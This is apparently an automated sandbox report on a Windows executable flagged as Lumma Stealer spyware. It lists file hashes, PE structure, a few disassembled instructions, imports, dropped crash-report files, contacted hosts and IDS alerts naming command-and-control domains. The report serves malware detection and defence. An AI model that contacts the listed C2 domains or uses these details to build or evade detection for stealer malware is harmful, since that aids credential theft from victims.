https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=e | SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png | SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://127.0.0.1:27060 | SPFFah2O2q.exe, 00000000.00000003.1510014210.0000000000540000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1533066550.0000000000540000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg | SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509926082.0000000000507000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://cdn.fastly.steamstatic.c | SPFFah2O2q.exe, 00000000.00000003.1510014210.0000000000540000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif | SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509926082.0000000000507000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ac.ecosia.org/autocomplete?q= | SPFFah2O2q.exe, 00000000.00000003.1534204760.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534063958.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534124766.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ | SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://crt.rootca1.amazontrust.com/rootca1.cer0? | SPFFah2O2q.exe, 00000000.00000003.1584367130.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp | SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://api.steampowered.com/ | SPFFah2O2q.exe, 00000000.00000003.1510014210.0000000000540000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://store.steampowered.com/account/cookiepreferences/ | SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1533023771.00000000005A4000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://store.steampowered.com/mobile | SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://steamcommunity.com/ | SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.157.254 | lev-tolstoi.com | United States | 13335 | CLOUDFLARENETUS | false
23.55.153.106 | steamcommunity.com | United States | 20940 | AKAMAI-ASN1EU | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1580893
Start date and time: 2024-12-26 12:56:09 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 29s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: SPFFah2O2q.exe (renamed because the original name is a hash value)
Original Sample Name: d4d4b5b6ca79bb5b57e8ef3791629e47.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@2/5@10/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 94%
• Number of executed functions: 20
• Number of non-executed functions: 210
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.189.173.21, 20.12.23.50, 40.126.53.6
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
06:57:07 | API Interceptor | 13x Sleep call for process: SPFFah2O2q.exe modified
06:57:36 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              Zun6NRK3q3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              P0SJULJxI0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              b0ho5YYSdo.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              C8QT9HkXEb.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              r06aMlvVyM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              No context
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                                              Entropy (8bit):1.0590633579224975
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:/7ZVqAgFKgX00q44V5mj5WmFXzuiFtZ24IO88Mu:eFK50q44yjDXzuiFtY4IO8e
                                                                                                                                                                                                                                                              MD5:162FFE795E17564D7138676D8837C18C
                                                                                                                                                                                                                                                              SHA1:60D9CB81F18DEA7A474936A07B6C3C6A8F02ECBD
                                                                                                                                                                                                                                                              SHA-256:C45BAC34CC3C6EBB6A5674D8779D2AE270135922DE7ACC862845AB44A32A74C5
                                                                                                                                                                                                                                                              SHA-512:DC706789CD10C04DA0195C72942BC8D57EEB40830D0F90CAADDA8453A3426C1B98230EC1C8FD29C98D3AD932E47F2ECA789EA5B057126632B091A7B9D656501C
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.6.8.7.8.4.6.3.0.2.4.0.7.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.6.8.7.8.4.6.8.9.6.1.4.9.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.c.0.9.b.2.0.1.-.b.4.1.a.-.4.7.b.1.-.9.6.0.9.-.f.d.7.e.e.0.f.9.b.e.5.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.4.1.e.3.6.e.2.-.1.5.7.f.-.4.0.d.c.-.b.5.5.b.-.d.2.d.8.1.9.e.9.1.d.3.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.P.F.F.a.h.2.O.2.q...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.3.0.0.-.0.0.0.1.-.0.0.1.4.-.b.3.3.e.-.f.2.4.8.8.d.5.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.5.a.5.e.b.f.4.3.d.1.d.f.c.2.7.8.0.d.c.6.d.a.4.1.5.7.c.4.a.7.6.0.0.0.0.f.f.f.f.!.0.0.0.0.6.b.8.a.0.d.8.b.8.8.4.5.6.5.2.7.4.8.4.a.3.e.e.d.5.8.f.2.4.9.1.3.1.d.7.4.f.4.3.6.!.S.P.F.F.a.h.2.O.2.q...e.x.e.....T.a.r.g.e.t.A.p.p.
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              File Type:Mini DuMP crash report, 15 streams, Thu Dec 26 11:57:26 2024, 0x1205a4 type
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):111258
                                                                                                                                                                                                                                                              Entropy (8bit):2.2323158898442985
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:384:qRqNHaJUjBPLAYcrTqIXbzBCNs1jsKxC+wfrEPc:qRqgCjBPLAnrTqIXvBvr05Yk
                                                                                                                                                                                                                                                              MD5:0C986202BA09821A95D99A58BD3A33F7
                                                                                                                                                                                                                                                              SHA1:0C6A1B9418C96B1F604AAF892FC2130B4C21E293
                                                                                                                                                                                                                                                              SHA-256:9E2A9B91815FAFD56B09591282D382912B7352769B5AD70C4F0A67B947116BC0
                                                                                                                                                                                                                                                              SHA-512:4026617D9EA5F95947B198CBE98B178E349367EC6AE13C32A50181EA67CEE94B8C5EE64F16DA44CA54F768424310EEA10C8F117A23A6E25A09E581BD721BF12A
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Preview:MDMP..a..... ........Dmg........................p...........,...h$...........Q..........`.......8...........T...........`F..:l...........%...........'..............................................................................eJ.......(......GenuineIntel............T............Dmg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):8358
                                                                                                                                                                                                                                                              Entropy (8bit):3.7011479887473406
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:R6l7wVeJkt46dIS6YSFSUz1Agmf6bsbpDM89bXXsfd9m:R6lXJT6OS6YASUzCgmfes3XcfW
                                                                                                                                                                                                                                                              MD5:A65C8A6582F2AC13013A1E2A62C6AD1F
                                                                                                                                                                                                                                                              SHA1:87D3ED6652575DF058BE7FA74B772B6405DF50CF
                                                                                                                                                                                                                                                              SHA-256:CD7655B2AB200D0BF6DFD1666354D128EFA8F2C2084EFBCA715A7A51D638ECBE
                                                                                                                                                                                                                                                              SHA-512:D8184B8A6822A0DC6DA96211C02882EC6C0ACE62BDDBB4FE144944E730DE07E607ACC18D162F995CFC497D6DF10561DA01D67DD1362E5BD7157197F282AC0C8A
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.6.8.<./.P.i.d.
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):4623
                                                                                                                                                                                                                                                              Entropy (8bit):4.50296389532311
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:48:cvIwWl8zsrJg77aI9uZWpW8VYwYm8M4JhK1OqFsla+q8MX2OWELQuzKydd:uIjfFI7go7VsJA4lawRE8uzKydd
                                                                                                                                                                                                                                                              MD5:34BC39FDC78048BE2FB80409E60C333E
                                                                                                                                                                                                                                                              SHA1:F135725F6390E787F3E877A1B26DFAB34465605E
                                                                                                                                                                                                                                                              SHA-256:FD2490205CB2F47ADBF8C3F87DEC12A2EE1CDE8E95DCDF53BD1145F6142B46BD
                                                                                                                                                                                                                                                              SHA-512:BE9E80CBE205468D5A9C357A5C6F09EE71D5C24A53698E38AED25A6253CE24C23355FF8A334384F9CCE9BCE0CE953CE217C6D229E5B9C56A9B48D9114EB70044
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="648180" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):1835008
                                                                                                                                                                                                                                                              Entropy (8bit):4.372087855371399
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:6144:/FVfpi6ceLP/9skLmb0ayWWSPtaJG8nAge35OlMMhA2AX4WABlguNMiL:tV1QyWWI/glMM6kF7Cq
                                                                                                                                                                                                                                                              MD5:745A8435A0174796E545702F9E9B43B3
                                                                                                                                                                                                                                                              SHA1:BE411CD981BDBB187F98F050FDD623DA7FAC7B3D
                                                                                                                                                                                                                                                              SHA-256:717AB866D530B0B0C6822587CCE5A0B2DED8347DE937D2EA9208A1A6DA1EEA45
                                                                                                                                                                                                                                                              SHA-512:DF71120F671E4444695E438C0BDAF1681B9CBBA6DCDDAC60EF1AE810EAFC954E38F660693AB120A3ED65A06ADF363F05D3CF3485989A7296454181839171422A
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Preview:regfC...C....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...T.W.................................................................................................................................................................................................................................................................................................................................................`........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):7.325926955203994
TrID:
• Win32 Executable (generic) a (10002005/4) 99.55%
• Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:SPFFah2O2q.exe
File size:316'928 bytes
MD5:d4d4b5b6ca79bb5b57e8ef3791629e47
SHA1:6b8a0d8b88456527484a3eed58f249131d74f436
SHA256:764ee0242a1a188052d65038c3967ceef1cc0554243bc60412d0d5a85064d053
SHA512:48950469edbd1a7f68740122dcf4ddfd7b5a78ed4642cee7f1d83318dad230f82432a5cf199052529fb075e39b8fa9bec55b6ff77c2557e1724f6202b4688f8f
SSDEEP:6144:fdEontYO7NQ29rG80/HS0RdoNOURamcjM:fCMtRVt4HjRKNOUUE
TLSH:3964F122B642D47AC44B50705C62FFA0AB7F7C315AB9884737682B6E5E702D1973B31B
                                                                                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\QG..0)..0)..0)..b..20)..b..=0)..b...0).?.R..0)..0(.b0)..b...0)..b...0)..b...0).Rich.0).........PE..L......f...................
Icon Hash:63796de171436e0f
Entrypoint:0x407276
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:TERMINAL_SERVER_AWARE
Time Stamp:0x66079EDC [Sat Mar 30 05:10:52 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:0
File Version Major:5
File Version Minor:0
Subsystem Version Major:5
Subsystem Version Minor:0
Import Hash:a7dc7db11c4c985cfc70cf6b0849448d
Instruction
call 00007FD230703736h
jmp 00007FD2306FD74Dh
call 00007FD2306FD90Ch
xchg cl, ch
jmp 00007FD2306FD8F4h
call 00007FD2306FD903h
fxch st(0), st(1)
jmp 00007FD2306FD8EBh
fabs
fld1
mov ch, cl
xor cl, cl
jmp 00007FD2306FD8E1h
mov byte ptr [ebp-00000090h], FFFFFFFEh
fabs
fxch st(0), st(1)
fabs
fxch st(0), st(1)
fpatan
or cl, cl
je 00007FD2306FD8D6h
fldpi
fsubrp st(1), st(0)
or ch, ch
je 00007FD2306FD8D4h
fchs
ret
fabs
fld st(0), st(0)
fld st(0), st(0)
fld1
fsubrp st(1), st(0)
fxch st(0), st(1)
fld1
faddp st(1), st(0)
fmulp st(1), st(0)
ftst
wait
fstsw word ptr [ebp-000000A0h]
wait
test byte ptr [ebp-0000009Fh], 00000001h
jne 00007FD2306FD8D7h
xor ch, ch
fsqrt
ret
pop eax
jmp 00007FD2306FE0EFh
fstp st(0)
fld tbyte ptr [004441FAh]
ret
fstp st(0)
or cl, cl
je 00007FD2306FD8DDh
fstp st(0)
fldpi
or ch, ch
je 00007FD2306FD8D4h
fchs
ret
fstp st(0)
fldz
or ch, ch
je 00007FD2306FD8C9h
fchs
ret
fstp st(0)
jmp 00007FD2306FE0C5h
fstp st(0)
mov cl, ch
jmp 00007FD2306FD8D2h
call 00007FD2306FD89Eh
jmp 00007FD2306FE0D0h
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
add esp, FFFFFD30h
push ebx
wait
fstcw word ptr [ebp+0000005Ch]
Programming Language:
• [C++] VS2008 build 21022
                                                                                                                                                                                                                                                              • [ASM] VS2008 build 21022
                                                                                                                                                                                                                                                              • [ C ] VS2008 build 21022
                                                                                                                                                                                                                                                              • [IMP] VS2005 build 50727
                                                                                                                                                                                                                                                              • [RES] VS2008 build 21022
                                                                                                                                                                                                                                                              • [LNK] VS2008 build 21022
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x433fc | 0x50 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4f000 | 0x3f50 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x5100 | 0x40 | .text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x190 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x42d38 | 0x42e00 | 2053a0c62c4f3579b9663862f90a17e3 | False | 0.8494341413551402 | data | 7.746542950910192 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x44000 | 0xae08 | 0x6400 | dde01b78c2baa927b7633aaa7ae77058 | False | 0.0894921875 | dBase III DBT, next free block index 7565155, 1st item "\017\311\377?" | 1.0754787329615867 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x4f000 | 0x6f50 | 0x4000 | 879b254da438f4897cd5f70f78339970 | False | 0.42529296875 | data | 3.995212372684333 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x523f8 | 0x330 | Device independent bitmap graphic, 48 x 96 x 1, image size 0 | | | 0.1948529411764706
RT_CURSOR | 0x52728 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 0 | | | 0.33223684210526316
RT_ICON | 0x4f2a0 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Romanian | Romania | 0.5282258064516129
RT_ICON | 0x4f968 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Romanian | Romania | 0.41203319502074687
RT_ICON | 0x51f10 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Romanian | Romania | 0.44680851063829785
RT_STRING | 0x52ab8 | 0x496 | data | Romanian | Romania | 0.4454855195911414
RT_ACCELERATOR | 0x523a8 | 0x50 | data | Romanian | Romania | 0.825
RT_GROUP_CURSOR | 0x52858 | 0x22 | data | | | 1.0294117647058822
RT_GROUP_ICON | 0x52378 | 0x30 | data | Romanian | Romania | 0.9375
RT_VERSION | 0x52880 | 0x234 | data | | | 0.5336879432624113
DLL | Import
KERNEL32.dll | EnumCalendarInfoA, WriteConsoleInputW, InterlockedIncrement, GetCurrentProcess, InterlockedCompareExchange, FindNextVolumeMountPointA, EscapeCommFunction, GetWindowsDirectoryA, EnumTimeFormatsW, CopyFileW, GetConsoleAliasExesLengthW, CreateSemaphoreA, SetComputerNameExW, GetShortPathNameA, LCMapStringA, InterlockedExchange, GetLogicalDriveStringsA, GetLastError, GetCurrentDirectoryW, SetLastError, GetProcAddress, VirtualAlloc, GetAtomNameA, LoadLibraryA, InterlockedExchangeAdd, SetCalendarInfoW, OpenEventA, GlobalUnWire, GetModuleHandleA, FreeEnvironmentStringsW, EnumDateFormatsW, GetVersionExA, ReadConsoleInputW, TerminateJobObject, GetCurrentProcessId, EnumCalendarInfoExA, CreateFileA, UnhandledExceptionFilter, SetUnhandledExceptionFilter, HeapReAlloc, HeapAlloc, GetCommandLineA, GetStartupInfoA, TerminateProcess, IsDebuggerPresent, GetModuleHandleW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, InterlockedDecrement, Sleep, HeapSize, ExitProcess, MultiByteToWideChar, ReadFile, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, GetStdHandle, GetFileType, DeleteCriticalSection, HeapFree, WriteFile, GetModuleFileNameA, SetFilePointer, HeapCreate, VirtualFree, CloseHandle, FreeEnvironmentStringsA, GetEnvironmentStrings, WideCharToMultiByte, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, RaiseException, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, InitializeCriticalSectionAndSpinCount, RtlUnwind, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW
SHELL32.dll | DragQueryPoint
ole32.dll | CoRegisterPSClsid

Language of compilation system | Country where language is spoken | Map
Romanian | Romania |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-26T12:57:08.211464+0100 | 2058354 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat) | 1 | 192.168.2.8 | 56154 | 1.1.1.1 | 53 | UDP
2024-12-26T12:57:08.692867+0100 | 2058364 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) | 1 | 192.168.2.8 | 54839 | 1.1.1.1 | 53 | UDP
2024-12-26T12:57:09.069993+0100 | 2058360 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) | 1 | 192.168.2.8 | 64416 | 1.1.1.1 | 53 | UDP
2024-12-26T12:57:09.293849+0100 | 2058370 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat) | 1 | 192.168.2.8 | 52196 | 1.1.1.1 | 53 | UDP
2024-12-26T12:57:09.692828+0100 | 2058362 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat) | 1 | 192.168.2.8 | 52581 | 1.1.1.1 | 53 | UDP
2024-12-26T12:57:09.922659+0100 | 2058376 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat) | 1 | 192.168.2.8 | 57407 | 1.1.1.1 | 53 | UDP
2024-12-26T12:57:10.149481+0100 | 2058358 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat) | 1 | 192.168.2.8 | 58515 | 1.1.1.1 | 53 | UDP
